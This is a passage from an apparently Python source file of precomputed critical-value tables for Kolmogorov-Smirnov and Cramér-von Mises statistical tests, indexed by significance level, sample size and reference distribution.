'beta1': 0.04823146494173067, 'beta2': 0.06837351075097187, 'beta4': 0.038486897300680556}, 300: {'uni': 0.05550906419590629, 'nor': 0.03978480548326124, 'beta1': 0.05571141547789926, 'beta2': 0.07663630270628857, 'beta4': 0.04434408116637903}, 200: {'uni': 0.06762156145960091, 'nor': 0.048648082377034274, 'beta1': 0.06798995743435188, 'beta2': 0.0901597857532756, 'beta4': 0.05417087708582158}, 150: {'uni': 0.0777889938150631, 'nor': 0.055992681950055134, 'beta1': 0.078310929702266, 'beta2': 0.10131183123822018, 'beta4': 0.062417414108562386}, 100: {'uni': 0.09459233371131393, 'nor': 0.06828184758918193, 'beta1': 0.09551945542738993, 'beta2': 0.1178069154885687, 'beta4': 0.07593328084768572}, 75: {'uni': 0.10866796055687228, 'nor': 0.07853952378167028, 'beta1': 0.10982303249195069, 'beta2': 0.13190968528845182, 'beta4': 0.08730445455818964}, 50: {'uni': 0.13131745651785992, 'nor': 0.09562198442675823, 'beta1': 0.1335175652395422, 'beta2': 0.15495495520954616, 'beta4': 0.10586806539719948}, 30: {'uni': 0.16622024765958232, 'nor': 0.1224700829191776, 'beta1': 0.16965623137726848, 'beta2': 0.18803738711333812, 'beta4': 0.13470969723802004}, 20: {'uni': 0.19877030362889103, 'nor': 0.14799815211895767, 'beta1': 0.20344160260647876, 'beta2': 0.21717215473139662, 'beta4': 0.161706399244382}, 10: {'uni': 0.26145583014921425, 'nor': 0.2046385546777918, 'beta1': 0.2695783330780789, 'beta2': 0.2744402713994778, 'beta4': 0.21759542548906985}}} # noqa: E501, E231 crit_val_ini_cm = {0.05: {1000: {'uni': 0.4594653273130281, 'nor': 0.12548409215203657, 'beta1': 0.4601325244776592, 'beta2': 2.6054538536684997, 'beta4': 0.19475509620124962}, 750: {'uni': 0.45799049980605744, 'nor': 0.12602524417442473, 'beta1': 0.46004206806029374, 'beta2': 2.1329896811378033, 'beta4': 0.19489847773362395}, 500: {'uni': 0.45925627371563715, 'nor': 0.12628494613337185, 'beta1': 0.46043257598514326, 'beta2': 1.8976333035266344, 'beta4': 0.19472713920556675}, 400: {'uni': 0.4550317088764882, 'nor': 0.12598689815558065, 'beta1': 0.4616845122929176, 'beta2': 1.67081859009825, 'beta4': 0.19310625273502202}, 300: {'uni': 0.4526386955716205, 'nor': 0.1258215616832631, 'beta1': 0.4621300837641701, 'beta2': 1.5237466437923628, 'beta4': 0.19308530495744508}, 200: {'uni': 0.4518991017642939, 'nor': 0.12579322471148224, 'beta1': 0.45814779697632135, 'beta2': 1.3141217632115256, 'beta4': 0.1907182023495619}, 150: {'uni': 0.4435801756869992, 'nor': 0.1261943477466138, 'beta1': 0.4603257655776193, 'beta2': 1.197499866156661, 'beta4': 0.19138023143214206}, 100: {'uni': 0.44398214960811005, 'nor': 0.1251049524249278, 'beta1': 0.45613701682564656, 'beta2': 1.0199854820373724, 'beta4': 0.1912520049669216}, 75: {'uni': 0.43855945433022814, 'nor': 0.12660427792231924, 'beta1': 0.4534542449640568, 'beta2': 0.9078879160230264, 'beta4': 0.18851203766812671}, 50: {'uni': 0.42185603966628915, 'nor': 0.1251135767029667, 'beta1': 0.4529463879788932, 'beta2': 0.7785693328825756, 'beta4': 0.18783979338011667}, 30: {'uni': 0.4007242486006498, 'nor': 0.12536020919060598, 'beta1': 0.433955290048165, 'beta2': 0.6300668797650217, 'beta4': 0.18309677695119683}, 20: {'uni': 0.37357963600331506, 'nor': 0.1244502347645548, 'beta1': 0.4098571660526302, 'beta2': 0.52578110215289, 'beta4': 0.17583001005443635}, 10: {'uni': 0.3015175081905277, 'nor': 0.12299654131879613, 'beta1': 0.3385532447833868, 'beta2': 0.35993981010958676, 'beta4': 0.1589058816117949}}, 0.001: {1000: {'uni': 1.161161598361952, 'nor': 0.2558443498119062, 'beta1': 1.1479519803384115, 'beta2': 6.709302131132306, 'beta4': 0.44475223680375087}, 750: {'uni': 1.151578196881537, 'nor': 0.2555050176799102, 'beta1': 1.1555400330755854, 'beta2': 5.432775518995104, 'beta4': 0.4383116823384742}, 500: {'uni': 1.1484428347021816, 'nor': 0.25417015345250027, 'beta1': 1.179178309999159, 'beta2': 4.891239107169016, 'beta4': 0.4389087929008622}, 400: {'uni': 1.1930541236855035, 'nor': 0.2518343883827663, 'beta1': 1.1803881424592395, 'beta2': 4.300235437758729, 'beta4': 0.4386478457920091}, 300: {'uni': 1.1473970431560971, 'nor': 0.25317628629366085, 'beta1': 1.1624327986427483, 'beta2': 3.8989413853739827, 'beta4': 0.44551847042340587}, 200: {'uni': 1.18082412252855, 'nor': 0.25899079782112855, 'beta1': 1.2025828386510071, 'beta2': 3.391511017366001, 'beta4': 0.4405063674404278}, 150: {'uni': 1.1387187678474655, 'nor': 0.25321382063754555, 'beta1': 1.1466986042414955, 'beta2': 2.970375106650482, 'beta4': 0.4398607423338549}, 100: {'uni': 1.1146160300547057, 'nor': 0.2591267084483367, 'beta1': 1.123764591588948, 'beta2': 2.557181557186044, 'beta4': 0.4349804526379736}, 75: {'uni': 1.1036094150895535, 'nor': 0.25037527962652184, 'beta1': 1.1576098464988671, 'beta2': 2.255565186689404, 'beta4': 0.4283114412555718}, 50: {'uni': 1.06359109192906, 'nor': 0.2593884319637725, 'beta1': 1.1172655406958785, 'beta2': 1.9088453990800698, 'beta4': 0.4147307819414802}, 30: {'uni': 0.9806221663466906, 'nor': 0.24979623637195073, 'beta1': 1.0995943461327278, 'beta2': 1.5374147736094401, 'beta4': 0.40449471961197647}, 20: {'uni': 0.9183844094874211, 'nor': 0.2410666264484626, 'beta1': 1.0121027232912676, 'beta2': 1.2429536313291623, 'beta4': 0.3910244272778875}, 10: {'uni': 0.705105426746303, 'nor': 0.2356691665356145, 'beta1': 0.7805556315358917, 'beta2': 0.8041905799529989, 'beta4': 0.3422805857620354}}, 0.005: {1000: {'uni': 0.8650500727527625, 'nor': 0.20355208320636353, 'beta1': 0.8609196227705078, 'beta2': 5.144036940610599, 'beta4': 0.3365600054421361}, 750: {'uni': 0.8626986115937819, 'nor': 0.1982484245115105, 'beta1': 0.8768929537385406, 'beta2': 4.121713329611062, 'beta4': 0.340394884525468}, 500: {'uni': 0.8463252948272091, 'nor': 0.204047905448246, 'beta1': 0.8643194167991456, 'beta2': 3.7142396090256673, 'beta4': 0.338149801728149}, 400: {'uni': 0.8759613393266179, 'nor': 0.20113796554865335, 'beta1': 0.8720674011608025, 'beta2': 3.234826377969159, 'beta4': 0.33251013574505706}, 300: {'uni': 0.8467830546773162, 'nor': 0.19835890349416413, 'beta1': 0.8625806550035283, 'beta2': 2.91747054310664, 'beta4': 0.3337907894045298}, 200: {'uni': 0.8671446864117717, 'nor': 0.19955136121772268, 'beta1': 0.8799640423750006, 'beta2': 2.5611562585381584, 'beta4': 0.33340460979200826}, 150: {'uni': 0.8504532982772084, 'nor': 0.20114192058643274, 'beta1': 0.8585546641050331, 'beta2': 2.2731935785727866, 'beta4': 0.33516132028355133}, 100: {'uni': 0.8262581996585238, 'nor': 0.20172429821482568, 'beta1': 0.8566261612415256, 'beta2': 1.9386478314789783, 'beta4': 0.33057577054096593}, 75: {'uni': 0.8231601092929631, 'nor': 0.19954548808488737, 'beta1': 0.8507692286383358, 'beta2': 1.7184750351160816, 'beta4': 0.3281716117279958}, 50: {'uni': 0.791311042044641, 'nor': 0.20201644061099297, 'beta1': 0.8253344560388312, 'beta2': 1.471598126502107, 'beta4': 0.3142747378332868}, 30: {'uni': 0.7454004085339159, 'nor': 0.19868948854462629, 'beta1': 0.8117279190997636, 'beta2': 1.163572754042539, 'beta4': 0.3134379622253203}, 20: {'uni': 0.6927111395174737, 'nor': 0.19799803099243843, 'beta1': 0.7690007170290268, 'beta2': 0.9674971023639148, 'beta4': 0.29755522914247085}, 10: {'uni': 0.5404922820663465, 'nor': 0.1897950283341688, 'beta1': 0.6048954133188673, 'beta2': 0.6396273271986439, 'beta4': 0.2661737354047272}}, 0.01: {1000: {'uni': 0.7366305701442963, 'nor': 0.18079399258995782, 'beta1': 0.7409500769469214, 'beta2': 4.379123588591741, 'beta4': 0.2924280426122813}, 750: {'uni': 0.7442238251513217, 'nor': 0.17730654116361785, 'beta1': 0.7432715265134635, 'beta2': 3.520644408051276, 'beta4': 0.2948533948139171}, 500: {'uni': 0.7295640623706077, 'nor': 0.18058378329387692, 'beta1': 0.7432308493338711, 'beta2': 3.1831218453213364, 'beta4': 0.29273348151982065}, 400: {'uni': 0.74825746560008, 'nor': 0.17857559572928583, 'beta1': 0.7513046011459512, 'beta2': 2.7813333770088593, 'beta4': 0.2920493370610846}, 300: {'uni': 0.7346085309181084, 'nor': 0.17814686297600194, 'beta1': 0.7384559054473249, 'beta2': 2.5293538764033396, 'beta4': 0.2930624211260037}, 200: {'uni': 0.7291492259573107, 'nor': 0.1770738854920472, 'beta1': 0.7468672378966367, 'beta2': 2.198188994091246, 'beta4': 0.2919775882512319}, 150: {'uni': 0.7235173729542574, 'nor': 0.17865467815894331, 'beta1': 0.7334497638668434, 'beta2': 1.9672046766786264, 'beta4': 0.2923645746551409}, 100: {'uni': 0.7062948565843012, 'nor': 0.17810159631256017, 'beta1': 0.7375298250695946, 'beta2': 1.6478430914391802, 'beta4': 0.2864079167189714}, 75: {'uni': 0.7048541225084534, 'nor': 0.1782357072385056, 'beta1': 0.7291152927800391, 'beta2': 1.4723510105994482, 'beta4': 0.28510459988581655}, 50: {'uni': 0.6822877555314413, 'nor': 0.17832163110271299, 'beta1': 0.7058926323102283, 'beta2': 1.2628603110009782, 'beta4': 0.2762680230658396}, 30: {'uni': 0.6438645415806148, 'nor': 0.17641294567529855, 'beta1': 0.6988358937799531, 'beta2': 1.00261546291451, 'beta4': 0.2728708936653677}, 20: {'uni': 0.5979389276979273, 'nor': 0.17733658586090492, 'beta1': 0.6634216883500963, 'beta2': 0.8401862828094895, 'beta4': 0.2581148398098823}, 10: {'uni': 0.47439214163279075, 'nor': 0.17006126698160068, 'beta1': 0.5291255307312486, 'beta2': 0.5561342600451974, 'beta4': 0.23396694517733096}}, 0.1: {1000: {'uni': 0.34460694172229767, 'nor': 0.10360382794686329, 'beta1': 0.34720511538309606, 'beta2': 1.8875836943154027, 'beta4': 0.15367514351394482}, 750: {'uni': 0.3451867692665267, 'nor': 0.10315529568661869, 'beta1': 0.3483346351805406, 'beta2': 1.5286450857480112, 'beta4': 0.1542030881869177}, 500: {'uni': 0.34164207323070384, 'nor': 0.10394394883772727, 'beta1': 0.34942375915790075, 'beta2': 1.3882095566154824, 'beta4': 0.15391095453357267}, 400: {'uni': 0.34651892768462955, 'nor': 0.1036273981872271, 'beta1': 0.3462081705189476, 'beta2': 1.2069446519288858, 'beta4': 0.1544497253882817}, 300: {'uni': 0.3428635737550537, 'nor': 0.1038942851019886, 'beta1': 0.3476223025035556, 'beta2': 1.1098635931611327, 'beta4': 0.15444570971940158}, 200: {'uni': 0.34041089582801143, 'nor': 0.10389233254481366, 'beta1': 0.34763445978967616, 'beta2': 0.9680266999416997, 'beta4': 0.15250676214014847}, 150: {'uni': 0.3377302693762681, 'nor': 0.10346526116949699, 'beta1': 0.34489227504038494, 'beta2': 0.8728702651269197, 'beta4': 0.1522928420716538}, 100: {'uni': 0.33355369989756883, 'nor': 0.10342904850983256, 'beta1': 0.3427607367426677, 'beta2': 0.7468081520100366, 'beta4': 0.151846388902334}, 75: {'uni': 0.3279519851250598, 'nor': 0.1033051672049144, 'beta1': 0.34059079399004955, 'beta2': 0.6701570036198051, 'beta4': 0.1507237727552958}, 50: {'uni': 0.320726154832351, 'nor': 0.10326137162907119, 'beta1': 0.33950765789386894, 'beta2': 0.5746838732278858, 'beta4': 0.1476312595625842}, 30: {'uni': 0.3048544686945858, 'nor': 0.1032506284925571, 'beta1': 0.3272112572888899, 'beta2': 0.4681866459910121, 'beta4': 0.14446811972146092}, 20: {'uni': 0.2846944243235544, 'nor': 0.1028801774665988, 'beta1': 0.31098139768353583, 'beta2': 0.39502874401480026, 'beta4': 0.14018723197105618}, 10: {'uni': 0.23151476199873214, 'nor': 0.10222753291379459, 'beta1': 0.2591691265371872, 'beta2': 0.27317146177593893, 'beta4': 0.12824901267237765}}, 0.2: {1000: {'uni': 0.23891699447877507, 'nor': 0.08094731846506226, 'beta1': 0.24094997843944543, 'beta2': 1.1721114900242817, 'beta4': 0.11543501824848225}, 750: {'uni': 0.2404933108907096, 'nor': 0.08091514974400534, 'beta1': 0.24060333173620502, 'beta2': 0.9693351882078056, 'beta4': 0.11578575775778918}, 500: {'uni': 0.23767299214394635, 'nor': 0.08143013376811509, 'beta1': 0.24272727287877066, 'beta2': 0.8833066278909469, 'beta4': 0.11540869401380342}, 400: {'uni': 0.2389502568536976, 'nor': 0.08131132500068124, 'beta1': 0.23929939472873027, 'beta2': 0.7740123343256322, 'beta4': 0.11612370917705966}, 300: {'uni': 0.23767421960657104, 'nor': 0.08137026978935988, 'beta1': 0.2413717405506026, 'beta2': 0.7075931771768734, 'beta4': 0.11572673022823697}, 200: {'uni': 0.2375380459668403, 'nor': 0.08138169789779784, 'beta1': 0.24093637511896582, 'beta2': 0.6212880525665451, 'beta4': 0.11464757578960799}, 150: {'uni': 0.2346674147394386, 'nor': 0.08111648704644667, 'beta1': 0.23871828329053957, 'beta2': 0.5639043523411755, 'beta4': 0.1144192658708614}, 100: {'uni': 0.23144277683193992, 'nor': 0.08086088008195286, 'beta1': 0.23765747593958084, 'beta2': 0.4871104294369415, 'beta4': 0.11369840709232508}, 75: {'uni': 0.22903357158577958, 'nor': 0.08107942066962537, 'beta1': 0.23687860277184203, 'beta2': 0.4387740764573971, 'beta4': 0.1133033325819042}, 50: {'uni': 0.22282964313663456, 'nor': 0.08128764938651908, 'beta1': 0.23467305038546576, 'beta2': 0.38174763155086583, 'beta4': 0.1112554646459918}, 30: {'uni': 0.21121535286091023, 'nor': 0.08154061002867806, 'beta1': 0.22669185244123524, 'beta2': 0.3149719244556432, 'beta4': 0.1087977058346659}, 20: {'uni': 0.19948749085011552, 'nor': 0.08117232367036036, 'beta1': 0.21669660949781708, 'beta2': 0.2693729942635194, 'beta4': 0.10597716119365037}, 10: {'uni': 0.16430469528177583, 'nor': 0.08150777731263585, 'beta1': 0.18122070967231182, 'beta2': 0.19059913324778516, 'beta4': 0.09776227574034621}}, 0.25: {1000: {'uni': 0.2073622245210208, 'nor': 0.07380009436406758, 'beta1': 0.20904068646385907, 'beta2': 0.9597148435930869, 'beta4': 0.10361053731297827}, 750: {'uni': 0.20830280107305865, 'nor': 0.07380726982919651, 'beta1': 0.2085995996243024, 'beta2': 0.7986091394776444, 'beta4': 0.10386137028660365}, 500: {'uni': 0.2063708005028261, 'nor': 0.07418743470211109, 'beta1': 0.21009413000274246, 'beta2': 0.7233087867046614, 'beta4': 0.103532945392617}, 400: {'uni': 0.20810791282236252, 'nor': 0.07407319000419614, 'beta1': 0.20749468421255743, 'beta2': 0.639061150743961, 'beta4': 0.1039097259786984}, 300: {'uni': 0.2069617339473839, 'nor': 0.07417041380366121, 'beta1': 0.20881311523590293, 'beta2': 0.5873404580341767, 'beta4': 0.10365164703335579}, 200: {'uni': 0.20633618881322238, 'nor': 0.07431380328185423, 'beta1': 0.2096349293319493, 'beta2': 0.5182222647556451, 'beta4': 0.10246873175611658}, 150: {'uni': 0.20397320572124797, 'nor': 0.07400405520839556, 'beta1': 0.20711157206009445, 'beta2': 0.47119547735400447, 'beta4': 0.10276373650008787}, 100: {'uni': 0.20130936260465182, 'nor': 0.07387183501067715, 'beta1': 0.20687465898503946, 'beta2': 0.40718701425151566, 'beta4': 0.10182092379405154}, 75: {'uni': 0.19852776314003645, 'nor': 0.07393158430130788, 'beta1': 0.20550667909573891, 'beta2': 0.3693192980610446, 'beta4': 0.10150395150740255}, 50: {'uni': 0.19388474978484183, 'nor': 0.07420083364025896, 'beta1': 0.20350014172907788, 'beta2': 0.32356832480704306, 'beta4': 0.0999746406180958}, 30: {'uni': 0.18355727709549313, 'nor': 0.07451794632809351, 'beta1': 0.19616222630838362, 'beta2': 0.26786333649854016, 'beta4': 0.0976861971100757}, 20: {'uni': 0.17328456961586736, 'nor': 0.07429319062250538, 'beta1': 0.18715487185431445, 'beta2': 0.23051142471255764, 'beta4': 0.09527608612752941}, 10: {'uni': 0.1439420051439661, 'nor': 0.07448506284496655, 'beta1': 0.15783717122161106, 'beta2': 0.165322481393709, 'beta4': 0.0881875611186847}}, 0.3: {1000: {'uni': 0.18266493036122441, 'nor': 0.06787398648836995, 'beta1': 0.18413714303934486, 'beta2': 0.7939484739262997, 'beta4': 0.09424089113895272}, 750: {'uni': 0.1834933385424178, 'nor': 0.06774823495176488, 'beta1': 0.18328690579924797, 'beta2': 0.6657885178958219, 'beta4': 0.09411764242286233}, 500: {'uni': 0.18210747710096634, 'nor': 0.0682050076857646, 'beta1': 0.18545982860570304, 'beta2': 0.6035300802969183, 'beta4': 0.09382274022146861}, 400: {'uni': 0.18303077478939317, 'nor': 0.06803420606952354, 'beta1': 0.1832023300936057, 'beta2': 0.5348503605172882, 'beta4': 0.09439504810213005}, 300: {'uni': 0.18177746911539827, 'nor': 0.06818473058282226, 'beta1': 0.18428212132088345, 'beta2': 0.4902376235565143, 'beta4': 0.09403788951347426}, 200: {'uni': 0.1816800164976337, 'nor': 0.06833889279734263, 'beta1': 0.18433678860840758, 'beta2': 0.4357735417384846, 'beta4': 0.0930165257817752}, 150: {'uni': 0.17998814397403265, 'nor': 0.06806323128922373, 'beta1': 0.18235304873781227, 'beta2': 0.3987631304299662, 'beta4': 0.09300297461109802}, 100: {'uni': 0.17734862196792756, 'nor': 0.06787056258025743, 'beta1': 0.18232920738794536, 'beta2': 0.34628591421707594, 'beta4': 0.09251758018601589}, 75: {'uni': 0.17501811415904828, 'nor': 0.06794778939736534, 'beta1': 0.1811216846739435, 'beta2': 0.31515956986054794, 'beta4': 0.09227802527028829}, 50: {'uni': 0.17127286320423607, 'nor': 0.06825835640417134, 'beta1': 0.1783095339004599, 'beta2': 0.2773715225887576, 'beta4': 0.09083180121082819}, 30: {'uni': 0.16210318531956106, 'nor': 0.06864306659301066, 'beta1': 0.17243143687559875, 'beta2': 0.23158692745518694, 'beta4': 0.08861156990151152}, 20: {'uni': 0.15293857531053232, 'nor': 0.06842370561655187, 'beta1': 0.1646586342377624, 'beta2': 0.20028710138975353, 'beta4': 0.08663292264169759}, 10: {'uni': 0.12764289106639928, 'nor': 0.06890998128086945, 'beta1': 0.13899778934023796, 'beta2': 0.1452153818161471, 'beta4': 0.08038247939430213}}} # noqa: E501, E231 crit_val_upd_ks = {0.001: {1000: {1000: {'uni': 0.06194167830060293, 'nor': 0.07822872053106872, 'beta1': 0.060972223483102383, 'beta2': 0.1259312803264634, 'beta4': 0.053644805280471275}, 750: {'uni': 0.07013498250410122, 'nor': 0.0846176702668644, 'beta1': 0.07382074910040726, 'beta2': 0.12721212549622074, 'beta4': 0.06265031431957047}, 500: {'uni': 0.08868191404192605, 'nor': 0.10172187597321586, 'beta1': 0.08635714610250639, 'beta2': 0.1354501683123147, 'beta4': 0.07939958283221715}, 400: {'uni': 0.09466328320945472, 'nor': 0.10653424583665405, 'beta1': 0.09812143640789389, 'beta2': 0.14231851569369025, 'beta4': 0.09001786186298039}, 300: {'uni': 0.112900393327934, 'nor': 0.11948590318054664, 'beta1': 0.1128099223418304, 'beta2': 0.15412182838111443, 'beta4': 0.10688640573728891}, 200: {'uni': 0.13999451914937044, 'nor': 0.14525209648524945, 'beta1': 0.1363146522235133, 'beta2': 0.17279316051643773, 'beta4': 0.13132853027863567}, 150: {'uni': 0.15825801427544206, 'nor': 0.16624699603775567, 'beta1': 0.15782699160464128, 'beta2': 0.19586569775328777, 'beta4': 0.15093718225825237}, 100: {'uni': 0.19109919414724275, 'nor': 0.19819275001361214, 'beta1': 0.19211678955447464, 'beta2': 0.21880574483038184, 'beta4': 0.18949005031175215}, 75: {'uni': 0.2198169498248439, 'nor': 0.22313893040183352, 'beta1': 0.22260086497739834, 'beta2': 0.24861080819897047, 'beta4': 0.21646042451513092}, 50: {'uni': 0.27110531940815974, 'nor': 0.26870229964436126, 'beta1': 0.27154448822648203, 'beta2': 0.2925856220451067, 'beta4': 0.2690827053650406}, 30: {'uni': 0.341159036875694, 'nor': 0.34417584958804415, 'beta1': 0.34742946906497024, 'beta2': 0.35887753792308147, 'beta4': 0.34251314662315646}, 20: {'uni': 0.4247074513367157, 'nor': 0.4257230167126152, 'beta1': 0.4147166360680411, 'beta2': 0.42712883590666906, 'beta4': 0.4243734735369824}, 10: {'uni': 0.5883376017796452, 'nor': 0.5763352676031682, 'beta1': 0.5744260319735885, 'beta2': 0.5823827801917355, 'beta4': 0.5678433762722503}}, 750: {1000: {'uni': 0.0611759570618689, 'nor': 0.08090222271917469, 'beta1': 0.06269089313861997, 'beta2': 0.12229377182596635, 'beta4': 0.05189322774912314}, 750: {'uni': 0.06999691237536224, 'nor': 0.08755856539246498, 'beta1': 0.07015966614757518, 'beta2': 0.12824148557035264, 'beta4': 0.06188500275856437}, 500: {'uni': 0.08538842360253246, 'nor': 0.10140984451333485, 'beta1': 0.08689642339864323, 'beta2': 0.1347503234468263, 'beta4': 0.07734069816818492}, 400: {'uni': 0.09683865057491581, 'nor': 0.11198143598374655, 'beta1': 0.0966354900118695, 'beta2': 0.14394540297183944, 'beta4': 0.08763861812335089}, 300: {'uni': 0.11157253985246895, 'nor': 0.12602422854188344, 'beta1': 0.11244663757346751, 'beta2': 0.1554651616593184, 'beta4': 0.10415578668422443}, 200: {'uni': 0.13654464830576057, 'nor': 0.15133013476858165, 'beta1': 0.13839044278268253, 'beta2': 0.16561454357136107, 'beta4': 0.13143244333617032}, 150: {'uni': 0.15622840528205983, 'nor': 0.16817043946341126, 'beta1': 0.15548905512988154, 'beta2': 0.18938825998267717, 'beta4': 0.14980964956382015}, 100: {'uni': 0.19579707682616415, 'nor': 0.19493448629254073, 'beta1': 0.1907364681295448, 'beta2': 0.21379910922104456, 'beta4': 0.18921973720089247}, 75: {'uni': 0.2217040971984533, 'nor': 0.22676199918015594, 'beta1': 0.22281270555321675, 'beta2': 0.24553068147624701, 'beta4': 0.2185653911488343}, 50: {'uni': 0.28058489484935584, 'nor': 0.2726192686778714, 'beta1': 0.27549434346061347, 'beta2': 0.2963953500479535, 'beta4': 0.2613706221802624}, 30: {'uni': 0.3542190682518411, 'nor': 0.3609105538670239, 'beta1': 0.346103596210534, 'beta2': 0.37037725489911305, 'beta4': 0.34271197416665083}, 20: {'uni': 0.4192705279674709, 'nor': 0.4227233474310455, 'beta1': 0.41559337298012755, 'beta2': 0.4320244942862363, 'beta4': 0.417645435565697}, 10: {'uni': 0.581210346357099, 'nor': 0.5914300273318283, 'beta1': 0.5798222632426484, 'beta2': 0.576140120904139, 'beta4': 0.5755991159580565}}, 500: {1000: {'uni': 0.06036407215881656, 'nor': 0.09090115403529747, 'beta1': 0.06255930197979287, 'beta2': 0.13359354983685368, 'beta4': 0.05069644528510775}, 750: {'uni': 0.07028443525653139, 'nor': 0.09555844399847702, 'beta1': 0.07153464071873405, 'beta2': 0.139381271869496, 'beta4': 0.060482876205486535}, 500: {'uni': 0.08736257185674318, 'nor': 0.10986008971817585, 'beta1': 0.08806460210132372, 'beta2': 0.14662206874056294, 'beta4': 0.07355203635067697}, 400: {'uni': 0.09738153077428247, 'nor': 0.11929320722653125, 'beta1': 0.09822023903171845, 'beta2': 0.1554507716764446, 'beta4': 0.0856711290635534}, 300: {'uni': 0.1142826184827973, 'nor': 0.13333306355949393, 'beta1': 0.11167159945610117, 'beta2': 0.16891471559153437, 'beta4': 0.10481821179485074}, 200: {'uni': 0.13674660783901085, 'nor': 0.1510767540153743, 'beta1': 0.13945129736328155, 'beta2': 0.1856231161919606, 'beta4': 0.1275501476407893}, 150: {'uni': 0.15662754110107693, 'nor': 0.17132793534131086, 'beta1': 0.1584778040085073, 'beta2': 0.20319728743391985, 'beta4': 0.14506897344382674}, 100: {'uni': 0.19187926872498368, 'nor': 0.20409409384231936, 'beta1': 0.18927583777700208, 'beta2': 0.23363291179999657, 'beta4': 0.18630089408915784}, 75: {'uni': 0.2198773014226113, 'nor': 0.22969594012702854, 'beta1': 0.22501859827640036, 'beta2': 0.2537264924207476, 'beta4': 0.22025245598758353}, 50: {'uni': 0.26703941343557996, 'nor': 0.2709855298709943, 'beta1': 0.26520771720638253, 'beta2': 0.30140881449323687, 'beta4': 0.2690849811291071}, 30: {'uni': 0.34535681060535584, 'nor': 0.3531786350766798, 'beta1': 0.34464606252236557, 'beta2': 0.3579140519043085, 'beta4': 0.34385764547646414}, 20: {'uni': 0.41654437214179635, 'nor': 0.4238773679688896, 'beta1': 0.4156688979762777, 'beta2': 0.4342947530823177, 'beta4': 0.41234511208135727}, 10: {'uni': 0.5927880081321425, 'nor': 0.571169284617098, 'beta1': 0.5890376211941302, 'beta2': 0.5799218969338741, 'beta4': 0.5772716599910823}}, 400: {1000: {'uni': 0.061610633047749275, 'nor': 0.09387417997070269, 'beta1': 0.060006123541623435, 'beta2': 0.13359508313715762, 'beta4': 0.050499024612637056}, 750: {'uni': 0.0725990060934733, 'nor': 0.09999368681512216, 'beta1': 0.0714711957562868, 'beta2': 0.1396657769543962, 'beta4': 0.05786321789604981}, 500: {'uni': 0.08793932634136903, 'nor': 0.1132890416520379, 'beta1': 0.08764486030536317, 'beta2': 0.1506116538331888, 'beta4': 0.07384003832444169}, 400: {'uni': 0.09509051332670226, 'nor': 0.12086275924386036, 'beta1': 0.09874882902727133, 'beta2': 0.15349299194370858, 'beta4': 0.0849049812616951}, 300: {'uni': 0.11300077096060224, 'nor': 0.13104186476027302, 'beta1': 0.11236264122161288, 'beta2': 0.16671246834931386, 'beta4': 0.10114052127037293}, 200: {'uni': 0.1395767904072489, 'nor': 0.15649703354689593, 'beta1': 0.1351482372851951, 'beta2': 0.18210013561700988, 'beta4': 0.12703437853096244}, 150: {'uni': 0.15452108891403543, 'nor': 0.17408683153597787, 'beta1': 0.15978450832788405, 'beta2': 0.2010339358813732, 'beta4': 0.1490451838403622}, 100: {'uni': 0.19691519706645344, 'nor': 0.20754956592257726, 'beta1': 0.19346981123970686, 'beta2': 0.2262546151997452, 'beta4': 0.18064848788367147}, 75: {'uni': 0.22469725100342314, 'nor': 0.2339068463269146, 'beta1': 0.218862094384225, 'beta2': 0.2504781042902142, 'beta4': 0.20969832951840517}, 50: {'uni': 0.2709684908276241, 'nor': 0.28043279667873244, 'beta1': 0.2702125438110171, 'beta2': 0.2976958783167438, 'beta4': 0.2606895236787564}, 30: {'uni': 0.34168179557445916, 'nor': 0.3593449909357798, 'beta1': 0.35415662361849687, 'beta2': 0.36288665404801707, 'beta4': 0.34182381626396197}, 20: {'uni': 0.4206707653595654, 'nor': 0.43121866894350125, 'beta1': 0.42741727811475116, 'beta2': 0.4389309415030842, 'beta4': 0.4300646949028815}, 10: {'uni': 0.5741086400057797, 'nor': 0.5830036630879967, 'beta1': 0.5709629834592885, 'beta2': 0.5875161854960175, 'beta4': 0.5881252365619546}}, 300: {1000: {'uni': 0.062161639188960005, 'nor': 0.10294382539615143, 'beta1': 0.0611596822319877, 'beta2': 0.14157458374551313, 'beta4': 0.049547505930433555}, 750: {'uni': 0.0709251826905879, 'nor': 0.11006834833669127, 'beta1': 0.07067419085948462, 'beta2': 0.14514453194775367, 'beta4': 0.058480081465393324}, 500: {'uni': 0.08637817894053323, 'nor': 0.12102770685673514, 'beta1': 0.08706590398005343, 'beta2': 0.15434162169167048, 'beta4': 0.07347251631345947}, 400: {'uni': 0.09753878203585215, 'nor': 0.12985513065211424, 'beta1': 0.0972356544421249, 'beta2': 0.1640862893662115, 'beta4': 0.08247651502832595}, 300: {'uni': 0.11086452484782922, 'nor': 0.13822319327826305, 'beta1': 0.11173259516719364, 'beta2': 0.1769745582721851, 'beta4': 0.09992542940472177}, 200: {'uni': 0.1399113243441577, 'nor': 0.15754885236536986, 'beta1': 0.136504750476084, 'beta2': 0.1941827278811873, 'beta4': 0.12077586465850387}, 150: {'uni': 0.1590697336850151, 'nor': 0.17753710966522074, 'beta1': 0.1580347543820162, 'beta2': 0.20987840790701257, 'beta4': 0.14471527608486495}, 100: {'uni': 0.1871751727081637, 'nor': 0.21427301060804643, 'beta1': 0.1929312353732119, 'beta2': 0.23670383329819866, 'beta4': 0.18070834369207195}, 75: {'uni': 0.21739174405685768, 'nor': 0.23735012999276262, 'beta1': 0.22576097503322584, 'beta2': 0.25410438149243303, 'beta4': 0.2141905644666299}, 50: {'uni': 0.2702693450523803, 'nor': 0.287556930723528, 'beta1': 0.26606292030801165, 'beta2': 0.3120374891941139, 'beta4': 0.2628605451724907}, 30: {'uni': 0.3633925191505936, 'nor': 0.3553499682791369, 'beta1': 0.3472416410315157, 'beta2': 0.36603539622620074, 'beta4': 0.3402149887634394}, 20: {'uni': 0.43686780250760227, 'nor': 0.43357372518649273, 'beta1': 0.4365167361387447, 'beta2': 0.4400213044310824, 'beta4': 0.4227051807564033}, 10: {'uni': 0.582850916214453, 'nor': 0.5881615041484773, 'beta1': 0.5909724443518736, 'beta2': 0.5979959647698587, 'beta4': 0.5748894185128298}}, 200: {1000: {'uni': 0.06189276066343463, 'nor': 0.11833873344342205, 'beta1': 0.061831743193413335, 'beta2': 0.15906399693195816, 'beta4': 0.048460784542351754}, 750: {'uni': 0.07134707707247834, 'nor': 0.12617513205267883, 'beta1': 0.07100572922533299, 'beta2': 0.1607658467629688, 'beta4': 0.05614867367172871}, 500: {'uni': 0.08564106049840525, 'nor': 0.13304497843595064, 'beta1': 0.0874138510347292, 'beta2': 0.17131354724595504, 'beta4': 0.07175587677838369}, 400: {'uni': 0.09267272777082991, 'nor': 